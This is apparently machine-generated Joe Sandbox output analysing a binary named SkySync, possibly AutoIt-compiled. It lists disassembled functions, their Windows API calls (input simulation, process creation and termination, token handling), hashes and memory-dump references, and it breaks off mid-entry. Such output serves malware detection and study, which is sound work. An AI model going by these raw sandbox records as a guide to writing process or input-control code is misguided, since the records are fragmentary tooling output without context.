Opcode ID: f4a7774beed3490b1d846372d10743b273bc7669aec6efcb66af3d19bbbb5e83
Instruction ID: ba431c67240d5a882a3b1c0f98fd362869c80bfea158e3b727395e62b508d4d1
Opcode Fuzzy Hash: f4a7774beed3490b1d846372d10743b273bc7669aec6efcb66af3d19bbbb5e83
Instruction Fuzzy Hash: 4341D030244302AFDB21DF24DC89FAA7BF8EB55361F1406A8F995872A2CB319805DB61

Function 00B1BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00B577B0,00000000,0103E3C8,?,?,00B577B0,?,00B1BC1A,?,?), ref: 00B1BD84
EnableWindow.USER32(?,00000000), ref: 00B1BDA8
ShowWindow.USER32(00B577B0,00000000,0103E3C8,?,?,00B577B0,?,00B1BC1A,?,?), ref: 00B1BE08
ShowWindow.USER32(?,00000004,?,00B1BC1A,?,?), ref: 00B1BE1A
EnableWindow.USER32(?,00000001), ref: 00B1BE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B1BE61

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 49de6d4ad9e0404c9da9790ed63cc11b576b77ec2c78c717b3d8ca23d4f0aa64
Instruction ID: 314387b6e3420fa60bdce621316e38b6c4750801a174d2fb04f455f64a6848c1
Opcode Fuzzy Hash: 49de6d4ad9e0404c9da9790ed63cc11b576b77ec2c78c717b3d8ca23d4f0aa64
Instruction Fuzzy Hash: DC412935600144AFDB2ACF28D589FD57BE1FF09314F5841F9EA588F2A2CB31A896CB51

Function 00B07788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00B0550C,?,?,00000000,00000001), ref: 00B07796

Part of subcall function 00B0406C: GetWindowRect.USER32(?,?), ref: 00B0407F

GetDesktopWindow.USER32 ref: 00B077C0
GetWindowRect.USER32(00000000), ref: 00B077C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B077F9

Part of subcall function 00AF57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AF5877

GetCursorPos.USER32(?), ref: 00B07825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B07883

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 0e0c9a7fd575cc1440adf3f7280ab5fd55aa5d694dae6694346f554c0284ca3d
Instruction ID: 3afe632db352a6f38d240e15289f9156f26e05ef58ccc32cdacbb1a027b3382a
Opcode Fuzzy Hash: 0e0c9a7fd575cc1440adf3f7280ab5fd55aa5d694dae6694346f554c0284ca3d
Instruction Fuzzy Hash: 8E31A172508309ABD720EF54C849F9ABBE9FB88314F004919F59597192DB30E909CBD2

Function 00AE9431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AE8CDE
Part of subcall function 00AE8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AE8CE8
Part of subcall function 00AE8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AE8CF7
Part of subcall function 00AE8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AE8CFE
Part of subcall function 00AE8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AE8D14

GetLengthSid.ADVAPI32(?,00000000,00AE904D), ref: 00AE9482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AE948E
HeapAlloc.KERNEL32(00000000), ref: 00AE9495
CopySid.ADVAPI32(00000000,00000000,?), ref: 00AE94AE
GetProcessHeap.KERNEL32(00000000,00000000,00AE904D), ref: 00AE94C2
HeapFree.KERNEL32(00000000), ref: 00AE94C9

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 9d9dd2e20b46c82960a60d52e942119b8bf3082bcea34f4917d5f05fe45b3106
Instruction ID: f8485c459eea416682986068084dbb1d0e82ab64d694a9e7a74f838f3fe934e9
Opcode Fuzzy Hash: 9d9dd2e20b46c82960a60d52e942119b8bf3082bcea34f4917d5f05fe45b3106
Instruction Fuzzy Hash: 4811BE32511704FFEB20AFA5CC09FAF7BA9FB45316F108018F945A7261DB3A9942CB60

Function 00AE91CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AE9200
OpenProcessToken.ADVAPI32(00000000), ref: 00AE9207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AE9216
CloseHandle.KERNEL32(00000004), ref: 00AE9221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AE9250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00AE9264

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 8447535edcc769b343fd4d9493887a9136b1ec42d0e2bedf4f28b3defca0a37b
Instruction ID: 81607766329eab697522328ecd3a29fe2a34928a52da82b80a1aa4ff03da78b5
Opcode Fuzzy Hash: 8447535edcc769b343fd4d9493887a9136b1ec42d0e2bedf4f28b3defca0a37b
Instruction Fuzzy Hash: A611477251124EABDF119F94ED49BDA7BA9EF08304F044125FE04A2161C6729D61EB61

Function 00AEC329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00AEC34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 00AEC35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AEC366
ReleaseDC.USER32(00000000,00000000), ref: 00AEC36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AEC385
MulDiv.KERNEL32(000009EC,?,?), ref: 00AEC397

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 9ba81f5c0a54f27f86304291b816b03b4e39b691c23cc02e63377e85b2f21c2e
Instruction ID: 271454b0f82435ee35a72c615d1ba13e368d372fe93dead357d392c816d1e672
Opcode Fuzzy Hash: 9ba81f5c0a54f27f86304291b816b03b4e39b691c23cc02e63377e85b2f21c2e
Instruction Fuzzy Hash: 92014875E00219BFEF105BA69D45A5EBFB8EB48761F004065FA04AB241DA709D11CF50

Function 00B1C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00A916CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A91729
Part of subcall function 00A916CF: SelectObject.GDI32(?,00000000), ref: 00A91738
Part of subcall function 00A916CF: BeginPath.GDI32(?), ref: 00A9174F
Part of subcall function 00A916CF: SelectObject.GDI32(?,00000000), ref: 00A91778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B1C57C
LineTo.GDI32(00000000,00000003,?), ref: 00B1C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B1C59E
LineTo.GDI32(00000000,00000000,?), ref: 00B1C5AE
EndPath.GDI32(00000000), ref: 00B1C5BE
StrokePath.GDI32(00000000), ref: 00B1C5CE

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: d44267c023fe67aef9d67d1bfa23444913432f8101b842dbfb523fa2c57f3904
Instruction ID: 2e0a4463dff1250134cd6fcbd5c3e824b9919c69187bbb03e8d1f81ae6aadde3
Opcode Fuzzy Hash: d44267c023fe67aef9d67d1bfa23444913432f8101b842dbfb523fa2c57f3904
Instruction Fuzzy Hash: C9111E7204010DBFEF12AF91DC49FEA7FADEB04355F048051BA1856161CB71AD56DBA0

Function 00AB07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AB07EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 00AB07F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AB07FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AB080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00AB0812
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AB081A

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 9a12e62eeab2903f08c4e21f150d2f4285ddf01dc5aaceef5689bba3c46525b5
Instruction ID: 38fd8aa56cd8f540ec87ca51dba673909351fb9d6f8a786457d797c3a2838a2b
Opcode Fuzzy Hash: 9a12e62eeab2903f08c4e21f150d2f4285ddf01dc5aaceef5689bba3c46525b5
Instruction Fuzzy Hash: 3F016CB09027597DE3009F5A8C85B52FFA8FF59354F00411BA15C47942C7F5A868CBE5

Function 00AF59A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AF59B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AF59CA
GetWindowThreadProcessId.USER32(?,?), ref: 00AF59D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AF59E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AF59F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AF59F9

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: c1dd880ae1787897452e36fdf3f6efa2861b4a1c24e44f1a8b774ad354de9b2f
Instruction ID: 3bc643353435d989dfb5f7f46d2e00bab0f5df6f47f7769e2f15f552efab2780
Opcode Fuzzy Hash: c1dd880ae1787897452e36fdf3f6efa2861b4a1c24e44f1a8b774ad354de9b2f
Instruction Fuzzy Hash: 10F03032651158BBE7316B929C0EEEF7F7CEFCAB12F000159FA05A2051DBA41A1387B5

Function 00AF77EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00AF77FE
EnterCriticalSection.KERNEL32(?,?,00A9C2B6,?,?), ref: 00AF780F
TerminateThread.KERNEL32(00000000,000001F6,?,00A9C2B6,?,?), ref: 00AF781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A9C2B6,?,?), ref: 00AF7829

Part of subcall function 00AF71F0: CloseHandle.KERNEL32(00000000,?,00AF7836,?,00A9C2B6,?,?), ref: 00AF71FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 00AF783C
LeaveCriticalSection.KERNEL32(?,?,00A9C2B6,?,?), ref: 00AF7843

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 58f6b52345254961bc54fbf60d5eefbaa90e65ed6bff047c03e82fbe0c458310
Instruction ID: 70fc3598c26f0c0938f8f523d75bb00c48207b2acadf237cc52b0773e1b41cce
Opcode Fuzzy Hash: 58f6b52345254961bc54fbf60d5eefbaa90e65ed6bff047c03e82fbe0c458310
Instruction Fuzzy Hash: 6DF05E32155212EBD7313BA4EC8CAFF7729FF49302B141422F202A60A2CFB55812CB60

Function 00AE954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AE9555
UnloadUserProfile.USERENV(?,?), ref: 00AE9561
CloseHandle.KERNEL32(?), ref: 00AE956A
CloseHandle.KERNEL32(?), ref: 00AE9572
GetProcessHeap.KERNEL32(00000000,?), ref: 00AE957B
HeapFree.KERNEL32(00000000), ref: 00AE9582

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: d5255ef4d591af29a30fdc76c106f62f9083faa00ae61a4afd42bcf386ee3464
Instruction ID: 354b14facace98e21236007d40d7f792852e221de231ba5fe50e5ab2a7b04760
Opcode Fuzzy Hash: d5255ef4d591af29a30fdc76c106f62f9083faa00ae61a4afd42bcf386ee3464
Instruction Fuzzy Hash: 48E0E536024101BBDB116FE1EC0C95ABF39FF4D722B104220F225A2471CF32A472DB50

Function 00B09E47 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00AE7D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AE7C62,80070057,?,?,?,00AE8073), ref: 00AE7D45
Part of subcall function 00AE7D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AE7C62,80070057,?,?), ref: 00AE7D60
Part of subcall function 00AE7D28: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AE7C62,80070057,?,?), ref: 00AE7D6E
Part of subcall function 00AE7D28: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AE7C62,80070057,?), ref: 00AE7D7E

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B09EF0
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00B0A06C
CoTaskMemFree.OLE32(?), ref: 00B0A077

Strings

NULL Pointer assignment, xrefs: 00B0A0C5

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 4175897753-2785691316
Opcode ID: 7773aa9090a7b6f5abb58160cbce641d5dc3036cfe927f29526ec092b2dc769a
Instruction ID: bf6b0b0cb201ee73dba5de9e36ddf6e52e79982911d0398125feabc886ed5d94
Opcode Fuzzy Hash: 7773aa9090a7b6f5abb58160cbce641d5dc3036cfe927f29526ec092b2dc769a
Instruction Fuzzy Hash: 30913A71D0022DEBDB10DFA5D981EDEBBB9EF08350F108159F519A7291EB719A44CFA0

Function 00B08CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B08CFD
CharUpperBuffW.USER32(?,?), ref: 00B08E0C
VariantClear.OLEAUT32(?), ref: 00B08F84

Part of subcall function 00AF7B1D: VariantInit.OLEAUT32(00000000), ref: 00AF7B5D
Part of subcall function 00AF7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00AF7B66
Part of subcall function 00AF7B1D: VariantClear.OLEAUT32(00000000), ref: 00AF7B72

Strings

AUTOIT.ERROR, xrefs: 00B08E12
Incorrect Parameter format, xrefs: 00B08D35, 00B08EF7

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: c1e4fb246c25086e5751b37f097d0d58f8ee1b6b67c214fb9f2315aff7d2a702
Instruction ID: 2e0a98915a2ec7ad4bc23d93f104fb565a40ed590c42f0bbc92c275b87622cfb
Opcode Fuzzy Hash: c1e4fb246c25086e5751b37f097d0d58f8ee1b6b67c214fb9f2315aff7d2a702
Instruction Fuzzy Hash: 3B917E746083019FCB10DF24C581D5ABBF5EF99754F1489ADF89A8B3A2DB30EA05CB52

Function 00B1DF09 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00B08A0E,?,00000000), ref: 00B1DF71
SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00B08A0E,?,00000000,00000000), ref: 00B1DFA7
GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 00B1DFB8
SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00B08A0E,?,00000000,00000000), ref: 00B1E03A

Strings

DllGetClassObject, xrefs: 00B1DFAD

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 3e10cea9157a64b1ea8d2128c71e1f29630534735ad8a8de6b73ed56f1122895
Instruction ID: 31bfb25f3fb46a449e29b5e07204411291ff95f36a4ac9d88b701b374b1839f1
Opcode Fuzzy Hash: 3e10cea9157a64b1ea8d2128c71e1f29630534735ad8a8de6b73ed56f1122895
Instruction Fuzzy Hash: F3419171600205EFDB15CF55D889AAA7BE9EF48710B9480EAFC059F206D7F1DE80CBA0

Function 00B178B6 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B17976
IsMenu.USER32(?), ref: 00B1798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B179D6
DrawMenuBar.USER32 ref: 00B179E9

Strings

0, xrefs: 00B178C3

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 18a259f28450c869ac6760e4718077c653799a0b11eca6d911f01b7534a85e52
Instruction ID: 3a89a3c554d5e97e7fad42b4d111c608109aaf66b7945d32a93ca195ff85d7cf
Opcode Fuzzy Hash: 18a259f28450c869ac6760e4718077c653799a0b11eca6d911f01b7534a85e52
Instruction Fuzzy Hash: 76416A71A44208EFDB20DF94E884EDABBF9FF09350F4481A9E95597250CB30AD94CFA0

Function 00B0DE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B0DEAE

Strings

none, xrefs: 00B0DF89
stdcall, xrefs: 00B0DF30
winapi, xrefs: 00B0DF1F
cdecl, xrefs: 00B0DF05

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 8ecf62e83e363feca1f74308ac70f8658b7a70b20e3e0ab02acf93d6e0c2d2ae
